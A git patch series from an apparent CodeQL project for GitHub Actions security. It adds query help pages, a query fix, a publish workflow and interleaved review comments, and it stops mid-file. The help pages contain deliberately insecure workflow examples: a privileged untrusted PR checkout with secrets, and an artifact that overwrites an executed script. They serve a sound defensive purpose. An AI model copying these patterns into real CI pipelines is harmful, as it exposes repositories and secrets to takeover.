+
+```yaml
+if: ${{ steps.checks.outputs.safe_to_run == true }}
+if: |-
+ ${{ steps.checks.outputs.safe_to_run == true }}
+```
+
+### Incorrect Usage
+
+1. Do not mix Workflow Expressions with un-delimited expressions:
+
+```yaml
+if: ${{ steps.checks.outputs.safe_to_run }} == true
+```
+
+2. Do not include trailing new lines or spaces:
+
+```yaml
+if: |
+ ${{ steps.checks.outputs.safe_to_run == true }}
+if: >
+ ${{ steps.checks.outputs.safe_to_run == true }}
+if: " ${{ steps.checks.outputs.safe_to_run == true }}"
+if: |+
+ ${{ steps.checks.outputs.safe_to_run == true }}
+if: >+
+ ${{ steps.checks.outputs.safe_to_run == true }}
+```
+
+## References
+
+- [Expression Always True Github Issue](https://github.com/actions/runner/issues/1173)
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md
new file mode 100644
index 000000000000..2d7afb6b66e1
--- /dev/null
+++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.md
@@ -0,0 +1,72 @@
+# Artifact poisoning
+
+## Description
+
+The workflow download artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job.
+
+## Recommendations
+
+- Always consider artifacts content as untrusted.
+- Extract the contents of artifacts to a temporary folder so they cannot override existing files.
+- Verify the contents of the artifacts downloaded. If an artifact is expected to contain a numeric value, verify it before using it.
+
+## Examples
+
+### Incorrect Usage
+
+The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs an script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files. An attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed.
+
+```yaml
+name: Insecure Workflow
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ - uses: dawidd6/action-download-artifact@v2
+ with:
+ name: pr_number
+ - name: Run command
+ run: |
+ sh cmd.sh
+```
+
+### Correct Usage
+
+The following example, correctly creates a temporary directory and stores the contents of the artifact there before calling `cmd.sh`.
+
+```yaml
+name: Insecure Workflow
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ - run: mkdir -p ${{ runner.temp }}/artifacts/
+ - uses: dawidd6/action-download-artifact@v2
+ with:
+ name: pr_number
+ path: ${{ runner.temp }}/artifacts/
+
+ - name: Run command
+ run: |
+ sh cmd.sh
+```
+
+## References
+
+- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md
new file mode 100644
index 000000000000..2d7afb6b66e1
--- /dev/null
+++ b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.md
@@ -0,0 +1,72 @@
+# Artifact poisoning
+
+## Description
+
+The workflow download artifacts that may be poisoned by an attacker in previously triggered workflows. If the contents of these artifacts are not correctly extracted, stored and verified, they may lead to repository compromise if untrusted code gets executed in a privileged job.
+
+## Recommendations
+
+- Always consider artifacts content as untrusted.
+- Extract the contents of artifacts to a temporary folder so they cannot override existing files.
+- Verify the contents of the artifacts downloaded. If an artifact is expected to contain a numeric value, verify it before using it.
+
+## Examples
+
+### Incorrect Usage
+
+The following workflow downloads an artifact that can potentially be controlled by an attacker and then runs an script from the runner workspace. Because the `dawidd6/action-download-artifact` by default downloads and extracts the contents of the artifacts overriding existing files. An attacker will be able to override the contents of `cmd.sh` and gain code execution when this file gets executed.
+
+```yaml
+name: Insecure Workflow
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ - uses: dawidd6/action-download-artifact@v2
+ with:
+ name: pr_number
+ - name: Run command
+ run: |
+ sh cmd.sh
+```
+
+### Correct Usage
+
+The following example, correctly creates a temporary directory and stores the contents of the artifact there before calling `cmd.sh`.
+
+```yaml
+name: Insecure Workflow
+
+on:
+ workflow_run:
+ workflows: ["Prev"]
+ types:
+ - completed
+
+jobs:
+ Download:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ - run: mkdir -p ${{ runner.temp }}/artifacts/
+ - uses: dawidd6/action-download-artifact@v2
+ with:
+ name: pr_number
+ path: ${{ runner.temp }}/artifacts/
+
+ - name: Run command
+ run: |
+ sh cmd.sh
+```
+
+## References
+
+- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)
diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.md b/ql/src/Security/CWE-829/UnpinnedActionsTag.md
new file mode 100644
index 000000000000..eab708f8602e
--- /dev/null
+++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.md
@@ -0,0 +1,27 @@
+# Unpinned tag for 3rd party Action in workflow
+
+## Description
+
+Using a tag for a 3rd party Action that is not pinned to a commit can lead to executing an untrusted Action through a supply chain attack.
+
+## Recommendations
+
+Pinning an action to a full length commit SHA is currently the only way to use an action as an immutable release. Pinning to a particular SHA helps mitigate the risk of a bad actor adding a backdoor to the action's repository, as they would need to generate a SHA-1 collision for a valid Git object payload. When selecting a SHA, you should verify it is from the action's repository and not a repository fork.
+
+## Examples
+
+### Incorrect Usage
+
+```yaml
+- uses: tj-actions/changed-files@v44
+```
+
+### Correct Usage
+
+```yaml
+- uses: tj-actions/changed-files@c65cd883420fd2eb864698a825fc4162dd94482c # v44
+```
+
+## References
+
+- [Using third-party actions](https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions#using-third-party-actions)
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md
new file mode 100644
index 000000000000..c391e1255edc
--- /dev/null
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.md
@@ -0,0 +1,137 @@
+# Execution of Untrusted Checkedout Code
+
+## Description
+
+GitHub workflows can be triggered through various repository events, including incoming pull requests (PRs) or comments on Issues/PRs. A potentially dangerous misuse of the triggers such as `pull_request_target` or `issue_comment` followed by an explicit checkout of untrusted code (Pull Request HEAD) may lead to repository compromise if untrusted code gets executed in a privileged job.
+
+## Recommendations
+
+- Avoid using `pull_request_target` unless necessary.
+- Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations.
+- Use labels like `safe to test` to vet PRs and manage the execution context appropriately.
+
+The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens).
+
+The artifacts downloaded from the first workflow should be considered untrusted and verified.
+
+## Examples
+
+### Incorrect Usage
+
+The following workflow checks-out untrusted code in a privileged context and runs user-controlled code (in this case package.json scripts) which will grant privileged access to the attacker:
+
+```yaml
+on: pull_request_target
+
+jobs:
+ build:
+ name: Build and test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+
+ - uses: actions/setup-node@v1
+ - run: |
+ npm install
+ npm build
+
+ - uses: completely/fakeaction@v2
+ with:
+ arg1: ${{ secrets.supersecret }}
+
+ - uses: fakerepo/comment-on-pr@v1
+ with:
+ message: |
+ Thank you!
+```
+
+### Correct Usage
+
+An example shows how to use two workflows: one for processing the untrusted PR and the other for using the results in a safe context.
+
+**ReceivePR.yml** (untrusted PR handling with artifact creation):
+
+```yaml
+name: Receive PR
+on:
+ pull_request:
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ - name: Build
+ run: /bin/bash ./build.sh
+ - name: Save PR number
+ run: |
+ mkdir -p ./pr
+ echo ${{ github.event.number }} > ./pr/NR
+ - uses: actions/upload-artifact@v2
+ with:
+ name: pr
+ path: pr/
+```
+
+**CommentPR.yml** (processing artifacts with privileged access):
+
+```yaml
+name: Comment on the pull request
+on:
+ workflow_run:
+ workflows: ["Receive PR"]
+ types:
+ - completed
+jobs:
+ upload:
+ runs-on: ubuntu-latest
+ if: >
+ github.event.workflow_run.event == 'pull_request' &&
+ github.event.workflow_run.conclusion == 'success'
+ steps:
+ - name: "Download artifact"
+ uses: actions/github-script@v3.1.0
+ with:
+ script: |
+ var artifacts = await github.actions.listWorkflowRunArtifacts({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ run_id: ${{github.event.workflow_run.id }},
+ });
+ var matchArtifact = artifacts.data.artifacts.filter((artifact) => {
+ return artifact.name == "pr";
+ })[0];
+ var download = await github.actions.downloadArtifact({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ artifact_id: matchArtifact.id,
+ archive_format: 'zip',
+ });
+ var fs = require('fs');
+ fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(download.data));
+ - run: |
+ mkdir -p tmp
+ unzip -d tmp/ pr.zip
+ - name: "Comment on PR"
+ uses: actions/github-script@v3
+ with:
+ github-token: ${{ secrets.GITHUB_TOKEN }}
+ script: |
+ var fs = require('fs');
+ var issue_number = Number(fs.readFileSync('./tmp/NR'));
+ // Verify that the file contains a numeric value
+ const contains_numeric = /\d/.test(issue_number);
+ if (contains_numeric) {
+ await github.issues.createComment({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ issue_number: issue_number,
+ body: 'Everything is OK. Thank you for the PR!'
+ });
+ }
+```
+
+## References
+
+- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md
new file mode 100644
index 000000000000..c391e1255edc
--- /dev/null
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.md
@@ -0,0 +1,137 @@
+# Execution of Untrusted Checkedout Code
+
+## Description
+
+GitHub workflows can be triggered through various repository events, including incoming pull requests (PRs) or comments on Issues/PRs. A potentially dangerous misuse of the triggers such as `pull_request_target` or `issue_comment` followed by an explicit checkout of untrusted code (Pull Request HEAD) may lead to repository compromise if untrusted code gets executed in a privileged job.
+
+## Recommendations
+
+- Avoid using `pull_request_target` unless necessary.
+- Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations.
+- Use labels like `safe to test` to vet PRs and manage the execution context appropriately.
+
+The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens).
+
+The artifacts downloaded from the first workflow should be considered untrusted and verified.
+
+## Examples
+
+### Incorrect Usage
+
+The following workflow checks-out untrusted code in a privileged context and runs user-controlled code (in this case package.json scripts) which will grant privileged access to the attacker:
+
+```yaml
+on: pull_request_target
+
+jobs:
+ build:
+ name: Build and test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+
+ - uses: actions/setup-node@v1
+ - run: |
+ npm install
+ npm build
+
+ - uses: completely/fakeaction@v2
+ with:
+ arg1: ${{ secrets.supersecret }}
+
+ - uses: fakerepo/comment-on-pr@v1
+ with:
+ message: |
+ Thank you!
+```
+
+### Correct Usage
+
+An example shows how to use two workflows: one for processing the untrusted PR and the other for using the results in a safe context.
+
+**ReceivePR.yml** (untrusted PR handling with artifact creation):
+
+```yaml
+name: Receive PR
+on:
+ pull_request:
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ - name: Build
+ run: /bin/bash ./build.sh
+ - name: Save PR number
+ run: |
+ mkdir -p ./pr
+ echo ${{ github.event.number }} > ./pr/NR
+ - uses: actions/upload-artifact@v2
+ with:
+ name: pr
+ path: pr/
+```
+
+**CommentPR.yml** (processing artifacts with privileged access):
+
+```yaml
+name: Comment on the pull request
+on:
+ workflow_run:
+ workflows: ["Receive PR"]
+ types:
+ - completed
+jobs:
+ upload:
+ runs-on: ubuntu-latest
+ if: >
+ github.event.workflow_run.event == 'pull_request' &&
+ github.event.workflow_run.conclusion == 'success'
+ steps:
+ - name: "Download artifact"
+ uses: actions/github-script@v3.1.0
+ with:
+ script: |
+ var artifacts = await github.actions.listWorkflowRunArtifacts({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ run_id: ${{github.event.workflow_run.id }},
+ });
+ var matchArtifact = artifacts.data.artifacts.filter((artifact) => {
+ return artifact.name == "pr";
+ })[0];
+ var download = await github.actions.downloadArtifact({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ artifact_id: matchArtifact.id,
+ archive_format: 'zip',
+ });
+ var fs = require('fs');
+ fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(download.data));
+ - run: |
+ mkdir -p tmp
+ unzip -d tmp/ pr.zip
+ - name: "Comment on PR"
+ uses: actions/github-script@v3
+ with:
+ github-token: ${{ secrets.GITHUB_TOKEN }}
+ script: |
+ var fs = require('fs');
+ var issue_number = Number(fs.readFileSync('./tmp/NR'));
+ // Verify that the file contains a numeric value
+ const contains_numeric = /\d/.test(issue_number);
+ if (contains_numeric) {
+ await github.issues.createComment({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ issue_number: issue_number,
+ body: 'Everything is OK. Thank you for the PR!'
+ });
+ }
+```
+
+## References
+
+- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md
new file mode 100644
index 000000000000..c391e1255edc
--- /dev/null
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.md
@@ -0,0 +1,137 @@
+# Execution of Untrusted Checkedout Code
+
+## Description
+
+GitHub workflows can be triggered through various repository events, including incoming pull requests (PRs) or comments on Issues/PRs. A potentially dangerous misuse of the triggers such as `pull_request_target` or `issue_comment` followed by an explicit checkout of untrusted code (Pull Request HEAD) may lead to repository compromise if untrusted code gets executed in a privileged job.
+
+## Recommendations
+
+- Avoid using `pull_request_target` unless necessary.
+- Employ unprivileged `pull_request` workflows followed by `workflow_run` for privileged operations.
+- Use labels like `safe to test` to vet PRs and manage the execution context appropriately.
+
+The best practice is to handle the potentially untrusted pull request via the **pull_request** trigger so that it is isolated in an unprivileged environment. The workflow processing the pull request should then store any results like code coverage or failed/passed tests in artifacts and exit. A second workflow should get triggered by the completion of the first one using `workflow_run` trigger event and access to repository secrets, so that it can download the artifacts and make any necessary modifications to the repository or interact with third party services that require repository secrets (e.g. API tokens).
+
+The artifacts downloaded from the first workflow should be considered untrusted and verified.
+
+## Examples
+
+### Incorrect Usage
+
+The following workflow checks-out untrusted code in a privileged context and runs user-controlled code (in this case package.json scripts) which will grant privileged access to the attacker:
+
+```yaml
+on: pull_request_target
+
+jobs:
+ build:
+ name: Build and test
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+
+ - uses: actions/setup-node@v1
+ - run: |
+ npm install
+ npm build
+
+ - uses: completely/fakeaction@v2
+ with:
+ arg1: ${{ secrets.supersecret }}
+
+ - uses: fakerepo/comment-on-pr@v1
+ with:
+ message: |
+ Thank you!
+```
+
+### Correct Usage
+
+An example shows how to use two workflows: one for processing the untrusted PR and the other for using the results in a safe context.
+
+**ReceivePR.yml** (untrusted PR handling with artifact creation):
+
+```yaml
+name: Receive PR
+on:
+ pull_request:
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v2
+ - name: Build
+ run: /bin/bash ./build.sh
+ - name: Save PR number
+ run: |
+ mkdir -p ./pr
+ echo ${{ github.event.number }} > ./pr/NR
+ - uses: actions/upload-artifact@v2
+ with:
+ name: pr
+ path: pr/
+```
+
+**CommentPR.yml** (processing artifacts with privileged access):
+
+```yaml
+name: Comment on the pull request
+on:
+ workflow_run:
+ workflows: ["Receive PR"]
+ types:
+ - completed
+jobs:
+ upload:
+ runs-on: ubuntu-latest
+ if: >
+ github.event.workflow_run.event == 'pull_request' &&
+ github.event.workflow_run.conclusion == 'success'
+ steps:
+ - name: "Download artifact"
+ uses: actions/github-script@v3.1.0
+ with:
+ script: |
+ var artifacts = await github.actions.listWorkflowRunArtifacts({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ run_id: ${{github.event.workflow_run.id }},
+ });
+ var matchArtifact = artifacts.data.artifacts.filter((artifact) => {
+ return artifact.name == "pr";
+ })[0];
+ var download = await 
github.actions.downloadArtifact({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ artifact_id: matchArtifact.id,
+ archive_format: 'zip',
+ });
+ var fs = require('fs');
+ fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(download.data));
+ - run: |
+ mkdir -p tmp
+ unzip -d tmp/ pr.zip
+ - name: "Comment on PR"
+ uses: actions/github-script@v3
+ with:
+ github-token: ${{ secrets.GITHUB_TOKEN }}
+ script: |
+ var fs = require('fs');
+ var issue_number = Number(fs.readFileSync('./tmp/NR'));
+ // Verify that the file contains a numeric value
+ const contains_numeric = /\d/.test(issue_number);
+ if (contains_numeric) {
+ await github.issues.createComment({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ issue_number: issue_number,
+ body: 'Everything is OK. Thank you for the PR!'
+ });
+ }
+```
+
+## References
+
+- [Keeping your GitHub Actions and workflows secure Part 1: Preventing pwn requests](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/)
From 569e80b6784cece7a90f1ac70585d2e6dbfee133 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Fri, 9 Aug 2024 17:17:18 +0200
Subject: [PATCH 470/707] Fix ImproperAccess query
---
 ql/src/Security/CWE-285/ImproperAccessControl.ql | 13 +++++++++----
 .../Security/CWE-285/ImproperAccessControl.expected | 2 +-
 2 files changed, 10 insertions(+), 5 deletions(-)
diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql
index 2c7882604b27..ba002f16a874 100644
--- a/ql/src/Security/CWE-285/ImproperAccessControl.ql
+++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql
@@ -17,9 +17,14 @@ import codeql.actions.security.ControlChecks from LocalJob job, LabelCheck check, MutableRefCheckoutStep checkout, Event event where job.isPrivileged() and - job.getATriggerEvent() = event and - event.getName() = "pull_request_target" and - event.getAnActivityType() = "synchronize" and - check.dominates(checkout) + job.getAStep() = checkout and + check.dominates(checkout) and + ( + job.getATriggerEvent() = event and + event.getName() = "pull_request_target" and + event.getAnActivityType() = "synchronize" + or + not exists(job.getATriggerEvent()) + ) select checkout, "The checked-out code can be modified after the authorization check $@.", check, check.toString() diff --git a/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected index 53dd12b9fb6e..92f87dc1f35b 100644 --- a/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected +++ b/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.expected @@ -1 +1 @@ -| .github/workflows/test1.yml:15:7:20:4 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/test1.yml:17:11:17:75 | contain ... test') | contain ... test') | +| .github/workflows/test1.yml:15:7:20:4 | Uses Step | The checked-out code can be modified after the authorization check $@. | .github/workflows/test1.yml:17:11:17:75 | contain ... test') | contain ... test') | From d166b7c03a085c4a2ee79a7f0015aacdc9b31b9e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:34:42 +0200 Subject: [PATCH 471/707] Create publish.yml --- .github/workflows/publish.yml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 .github/workflows/publish.yml diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml new file mode 100644 index 000000000000..390d68453454 --- /dev/null +++ b/.github/workflows/publish.yml 
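Review bot: The new `not exists(job.getATriggerEvent())` disjunct makes the query report every privileged job whose trigger event is unknown, regardless of whether that job could ever be reached from a `pull_request_target`/`synchronize` event, and the hunk does not say why that is the intended default. A comment above the opening `(` would record the decision, e.g. `// No trigger event is known for this job (presumably a reusable workflow whose caller decides): treat it as reachable from pull_request_target`, hedged because the hunk does not show which jobs lack one. Separately, `event.getAnActivityType() = "synchronize"` only covers a `pull_request_target` trigger that declares no `types:` if the library reports default activity types; if it returns only explicitly listed ones, a bare `on: pull_request_target` (whose defaults include synchronize) is silently skipped, which deserves a test case next to the updated .expected file. The `from`/`where`/`select` clause is visible in full within the hunk.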
@@ -0,0 +1,26 @@ +name: Publish +on: + workflow_dispatch: + +jobs: + tests: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v3 + - name: Fetch CodeQL + shell: bash + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + gh extension install github/gh-codeql + gh codeql set-channel "nightly" + gh codeql version + printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" + gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" + - name: Publish + env: + GITHUB_TOKEN: ${{ secrets.GHCR_TOKEN }} + run: | + codeql pack publish ql/lib + codeql pack publish ql/src From 2b8169b000780fd82fd69bccc460e10db0160cd1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:37:52 +0200 Subject: [PATCH 472/707] Update publish.yml --- .github/workflows/publish.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index 390d68453454..b09112f2fdd4 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml @@ -18,6 +18,14 @@ jobs: printf "CODEQL_FETCHED_CODEQL_PATH=" >> "${GITHUB_ENV}" gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_ENV}" gh codeql version --format=json | jq -r .unpackedLocation >> "${GITHUB_PATH}" + - name: Install Packs + env: + GITHUB_TOKEN: ${{ github.token }} + run: | + gh repo clone github/codeql + codeql pack install "ql/lib" + codeql pack install "ql/src" + codeql pack install "ql/test" - name: Publish env: GITHUB_TOKEN: ${{ secrets.GHCR_TOKEN }} From 23754b6d2f7868fdde57588f38cb8ad58547ce3f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Aug 2024 17:38:57 +0200 Subject: [PATCH 473/707] Update publish.yml --- .github/workflows/publish.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
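Review bot: The new workflow declares no `permissions:` key, so `${{ github.token }}` in the Fetch CodeQL step runs with the repository default, which this repository's own MissingActionsPermissions documentation says is read-write for organisations and repositories created before February 2023; the job only needs to read the checkout, so add at the workflow root `permissions:` followed by `  contents: read`. The `GHCR_TOKEN` secret is exposed only to the Publish step, which is the right scope, but `actions/checkout@v3` and `gh codeql set-channel "nightly"` mean each run publishes packs built against an unpinned nightly CLI; pinning the action to a commit SHA and the channel to a release would make a published pack reproducible from the workflow file. The two `jq -r .unpackedLocation >> "${GITHUB_ENV}"` / `"${GITHUB_PATH}"` writes rely on the first-party `gh codeql` output containing no newline, which is reasonable but worth a one-line comment so a later edit does not route untrusted output through the same pattern.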
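Review bot: `gh repo clone github/codeql` in the new Install Packs step clones the unpinned default branch of a large repository, and nothing else in the hunk refers to the clone — the three `codeql pack install` calls resolve declared dependencies on their own as far as this hunk shows. If the clone is needed for local pack resolution, pin it, e.g. `gh repo clone github/codeql -- --branch <CODEQL_TAG> --depth 1`, and add a comment saying what it provides; otherwise drop it to keep the publish job minimal and reproducible. The surrounding Fetch CodeQL and Publish steps appear here only as context.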
diff --git a/.github/workflows/publish.yml b/.github/workflows/publish.yml index b09112f2fdd4..bfe87d1056c4 100644 --- a/.github/workflows/publish.yml +++ b/.github/workflows/publish.yml @@ -3,7 +3,7 @@ on: workflow_dispatch: jobs: - tests: + publish: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 From cc6badaea6fd22a4074da7e2f0717ff75ad28f0b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Sat, 10 Aug 2024 09:54:23 +0000 Subject: [PATCH 474/707] grammar --- ql/src/Security/CWE-077/EnvPathInjectionCritical.md | 2 +- ql/src/Security/CWE-077/EnvPathInjectionMedium.md | 2 +- ql/src/Security/CWE-077/EnvVarInjectionCritical.md | 2 +- ql/src/Security/CWE-077/EnvVarInjectionMedium.md | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md index 1891d41fa394..88cc06de90a4 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md @@ -2,7 +2,7 @@ ## Description -GitHub Actions allows to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. +GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. ```bash echo "$HOME/.local/bin" >> $GITHUB_PATH diff --git a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md index 1891d41fa394..88cc06de90a4 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionMedium.md 
@@ -2,7 +2,7 @@ ## Description -GitHub Actions allows to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. +GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. ```bash echo "$HOME/.local/bin" >> $GITHUB_PATH diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md index 1d33a014d4b4..a16b41e3970d 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.md @@ -2,7 +2,7 @@ ## Description -GitHub Actions allows to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: +GitHub Actions allow to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: This file should lines in the `KEY=VALUE` format: diff --git a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md index 1d33a014d4b4..a16b41e3970d 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionMedium.md +++ b/ql/src/Security/CWE-077/EnvVarInjectionMedium.md @@ -2,7 +2,7 @@ ## Description -GitHub Actions allows to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: +GitHub Actions allow to define Environment Variables by writing to a file pointed to by the `GITHUB_ENV` environment variable: This file should lines in the `KEY=VALUE` format: From 77ecca9f5e8951d26f9d7bfde8f3b8f1b11b0bc2 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Jaroslav=20Loba=C4=8Devski?= Date: Sat, 10 Aug 2024 10:17:40 +0000 Subject: [PATCH 475/707] grammar --- ql/src/Security/CWE-077/EnvPathInjectionCritical.md | 8 +++++--- ql/src/Security/CWE-077/EnvPathInjectionMedium.md | 8 +++++--- 2 files changed, 10 insertions(+), 6 deletions(-) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md index 88cc06de90a4..ae9afbb76f45 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.md +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.md @@ -2,17 +2,19 @@ ## Description -GitHub Actions allow to define the system PATH variable by writing to a file pointed to by the `GITHUB_PATH` environment variable. Writing to this file will prepend a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. E.g. +GitHub Actions allow to define the system PATH variable by writing to a file pointed by the `GITHUB_PATH` environment variable. Writing to this file appends a directory to the system PATH variable and automatically makes it available to all subsequent actions in the current job. + +E.g.: ```bash echo "$HOME/.local/bin" >> $GITHUB_PATH ``` -If an attacker can control the contents of the path being assigned to the system PATH, they will be able to influence what commands are run in subsequen steps of the same job. +If an attacker can control the contents of the system PATH, they are able to influence what commands are run in subsequent steps of the same job. ## Recommendations -- Do Not Allow Untrusted Data to Influence The System PATH: Avoid using untrusted data 